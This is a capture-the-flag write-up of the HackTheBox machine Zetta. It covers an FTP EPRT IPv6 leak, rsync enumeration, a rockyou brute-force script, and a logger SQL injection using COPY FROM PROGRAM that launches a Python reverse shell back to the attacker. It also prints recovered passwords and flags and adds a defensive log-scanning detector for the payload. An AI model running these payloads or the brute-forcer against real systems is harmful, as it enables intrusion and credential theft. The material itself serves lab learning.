HackTheBox - Zetta

Summary

Zetta, a Linux box created by HackTheBox user jkr, was overall a hard difficulty box. The initial foothold was leaking the box's IPv6 address through the FXP support of its FTP server. Enumerating the IPv6 address we find a new port, 8730, running rsync; enumerating that we find we can upload an SSH key and get a shell as the user. From here on the box was really hard. First we find the .tudu.xml file, which contains roy's todo list. Then we see that rsyslog is installed, so we try to look at its config; we can't read it directly, but we can copy the .git folder inside /etc/rsyslog.d and run git stash to get the config, where we see that local7.info is pushed to a postgres database. Seeing nothing else interesting, I started to poke around and tried an SQL injection there; with a lot of effort we get a shell as postgres and find a .psql_history file containing the postgres password. Together with a hint from roy's todo we get the root password, and we have pwned Zetta.

Initial Enumeration

```
# Nmap 7.70 scan initiated Sun Sep  1 23:24:10 2019 as: nmap -sC -sV -oN nmap/zetta 10.10.10.156
Nmap scan report for 10.10.10.156
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
|   2048 2d:82:60:c1:8c:8d:39:d2:fc:8b:99:5c:a2:47:f0:b0 (RSA)
|   256 1f:1b:0e:9a:91:b1:10:5f:75:20:9b:a0:8e:fd:e4:c1 (ECDSA)
|_  256 b5:0c:a1:2c:1c:71:dd:88:a4:28:e0:89:c9:a3:a0:ab (ED25519)
80/tcp open  http    nginx
|_http-server-header: nginx
|_http-title: Ze::a Share
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 1 23:24:39 2019 -- 1 IP address (1 host up) scanned in 29.54 seconds
```

The initial nmap scan shows ports 21, 22 and 80 open.

On the webpage we find FTP credentials we can use to log in to FTP.

Logging in to FTP with them, we also see an RFC mentioned.

We see the same line in the FTP banner when we log in:

```
230-This server supports FXP transfers
```

So we take a look at the RFC.

Using that information we can leak the IPv6 address of the box with

```
ftp> quote EPRT |2|dead:beef:2::XXXX|1234|
200 PORT command successful
ftp> quote list
```

and on our listener we get

```
$ nc -6 -nvlp 1234
Connection received on dead:beef::250:56ff:feb9:d97e 52516
```

so the IPv6 address of the box is dead:beef::250:56ff:feb9:d97e.

*Note: The IPv6 address keeps changing.

User

```
# Nmap 7.80 scan initiated Tue Dec 31 08:45:53 2019 as: nmap -p- -oA nmap/all-6 -6 dead:beef::250:56ff:feb9:d97e
Nmap scan report for dead:beef::250:56ff:feb9:d97e
Host is up (0.13s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
80/tcp    open     http
8730/tcp  open     unknown
63563/tcp filtered unknown

# Nmap done at Tue Dec 31 09:48:37 2019 -- 1 IP address (1 host up) scanned in 3763.57 seconds
```

```
# Nmap 7.80 scan initiated Tue Dec 31 09:49:53 2019 as: nmap -p 8730 -sC -sV -oN nmap/zetta-8730 -6 dead:beef::250:56ff:feb9:d97e
Nmap scan report for dead:beef::250:56ff:feb9:d97e
Host is up (0.13s latency).

PORT     STATE SERVICE VERSION
8730/tcp open  rsync   (protocol version 31)

Host script results:
| address-info:
|   IPv6 EUI-64:
|     MAC address:
|       address: 00:50:56:b9:d9:7e
|_      manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 31 09:49:54 2019 -- 1 IP address (1 host up) scanned in 1.27 seconds
```

We try to list all the modules using

```
rsync --port=8730 -av zetta.htb::
```

and we get

```
bin             Backup access to /bin
boot            Backup access to /boot
lib             Backup access to /lib
lib64           Backup access to /lib64
opt             Backup access to /opt
sbin            Backup access to /sbin
srv             Backup access to /srv
usr             Backup access to /usr
var             Backup access to /var
```

but we get an error when we try to sync any of them. The one thing obviously missing from the list is etc, so we try that too with

```
rsync --port=8730 -av zetta.htb::etc .
```

and we can download all the files in etc. Reading rsyncd.conf we see that [etc] and [home_roy] were hidden from the module listing, and that [home_roy] requires a password (secrets file = /etc/rsyncd.secrets):

```
# Syncable home directory for .dot file sync for me.
# NOTE: Need to get this into GitHub repository and use git for sync.
[home_roy]
path = /home/roy
read only = no
# Authenticate user for security reasons.
uid = roy
gid = roy
auth users = roy
secrets file = /etc/rsyncd.secrets
# Hide home module so that no one tries to access it.
list = false
```

Since [home_roy] needs roy's rsync password, we try the rockyou wordlist against it with a small script:

```bash
#!/bin/bash
# Try every candidate from rockyou as roy's rsync password for the hidden home_roy module.
# rsync exits 0 only when the daemon accepts the password (the original redirected
# stderr to a file literally named "1"; both streams now go to /dev/null).
while IFS= read -r line; do
    echo "Trying: $line"
    sshpass -p "$line" rsync --port=8730 -av roy@zetta.htb::home_roy >/dev/null 2>&1
    if [[ $? -eq 0 ]]; then
        echo "Found Password: $line"
        exit 0
    fi
done < /usr/share/wordlists/rockyou.txt
```

and with this we get the password: computer.

Let's generate an SSH key pair and upload the .ssh directory to get a shell as the user.

```
rsync -6avrzh .ssh rsync://roy@zetta.htb:8730/home_roy/
```

and another interesting thing is

and we also get user.txt:

a575bdb345f2de0a3172c8282452be91

Privilege Escalation

In roy's todo we see that rsyslog is set up to push logs to postgres.

So he had set up rsyslog for logging and for pushing the data into a postgres database, but we don't have the credentials for it.

The files in /etc/rsyslog.d are not readable, but the .git folder inside it is, so we copy that folder to /tmp and run git stash there to recover all the files of /etc/rsyslog.d. However, git status in /etc/rsyslog.d shows that the file was modified afterwards, and the postgres password we recover this way does not work.

The interesting thing we do see is the INSERT query rsyslog uses, so we think we can do an SQL injection through a logged message to get a shell.

After trying a lot of things we were able to get the shell.

The PostgreSQL dollar-quoting sequence `$$` was used as a replacement for `'`, and we get the shell using

```bash
logger -p local7.info "\$',now());DROP TABLE IF EXISTS test;CREATE table test (t TEXT);COPY test from program \$\$python3 /tmp/rev.py\$\$;-- -"
```

with /tmp/rev.py being a plain Python reverse shell:

```python
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.X.X", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
```

and we get a shell as the postgres user.
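Because rsyslog hands the message to PostgreSQL inside a plain INSERT, the injected statement ends up verbatim in the database's statement log when `log_statement` is enabled. As an added example (not part of the original writeup, and not code from the box), the following Python checker scans constructed PostgreSQL log lines for the traits of this payload (a stacked statement after the VALUES list, `COPY ... FROM PROGRAM`, dollar quoting) and reports which role the log-ingest INSERTs run as; seeing `postgres` there is the least-privilege problem that made `COPY FROM PROGRAM` reachable. The log format, `log_line_prefix`, table name and sample lines are all assumed.

```python
import re

# Constructed PostgreSQL statement-log sample (log_statement = 'all'); line 2 is
# what a crafted local7.info message looks like once rsyslog has spliced it into
# its INSERT template. Assumed log_line_prefix '%m [%p] %u@%d ', not the box's real one.
SAMPLE_LOG = """\
2019-12-31 10:01:02 UTC [1201] postgres@syslog LOG:  statement: INSERT INTO syslog_lines (message, devicereportedtime) VALUES ('cron[412]: (root) CMD (run-parts /etc/cron.hourly)', now())
2019-12-31 10:01:07 UTC [1201] postgres@syslog LOG:  statement: INSERT INTO syslog_lines (message, devicereportedtime) VALUES ('$',now());DROP TABLE IF EXISTS test;CREATE table test (t TEXT);COPY test from program $$python3 /tmp/rev.py$$;-- -', now())
2019-12-31 10:01:09 UTC [1201] postgres@syslog LOG:  statement: INSERT INTO syslog_lines (message, devicereportedtime) VALUES ('sshd[900]: Accepted publickey for roy', now())
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d \S+) \[(?P<pid>\d+)\] "
    r"(?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement: (?P<stmt>.*)$"
)

# Things a plain syslog INSERT should never contain.
RULES = {
    # a second statement smuggled in after the VALUES list is closed
    "stacked_statement": re.compile(r";\s*(DROP|CREATE|COPY|ALTER|GRANT)\b", re.I),
    # COPY ... FROM PROGRAM runs a shell command as the postgres OS user
    "copy_from_program": re.compile(r"\bCOPY\b.+?\bFROM\s+PROGRAM\b", re.I | re.S),
    # dollar quoting lets a payload carry a string without using a quote character
    "dollar_quoted_string": re.compile(r"\$\$"),
}

def parse(text):
    """Yield (lineno, user, statement) for every line in the expected format."""
    for n, raw in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(raw)
        if m:
            yield n, m.group("user"), m.group("stmt")

def scan_log(text):
    """One finding per suspicious statement: line number, role, rules that hit."""
    findings = []
    for n, user, stmt in parse(text):
        hits = [name for name, rx in RULES.items() if rx.search(stmt)]
        if hits:
            findings.append({"line": n, "user": user, "rules": hits})
    return findings

def ingest_roles(text):
    """Roles issuing the log-ingest INSERTs. Seeing 'postgres' means rsyslog
    writes as a superuser, which is what makes COPY FROM PROGRAM reachable."""
    return {user for _, user, stmt in parse(text) if stmt.upper().startswith("INSERT")}

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} as {f['user']}: {', '.join(f['rules'])}")
```

The fix on the database side is the same as the finding suggests: give rsyslog a dedicated role with INSERT on the log table only, so a stacked statement cannot reach COPY FROM PROGRAM even if the template escaping fails.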

In the postgres shell, while enumerating, we see a password inside `/var/lib/postgresql/.psql_history`:

```sql
ALTER USER postgres WITH PASSWORD 'sup3rs3cur3p4ass@postgres';
```

Following the hint from roy's todo, we try sup3rs3cur3p4ass@root as the password for root, and we get a root shell.

Now we can read root.txt: b9407e837fb779abc934d6db89ed4c42

and we have pwned Zetta 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/zetta/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.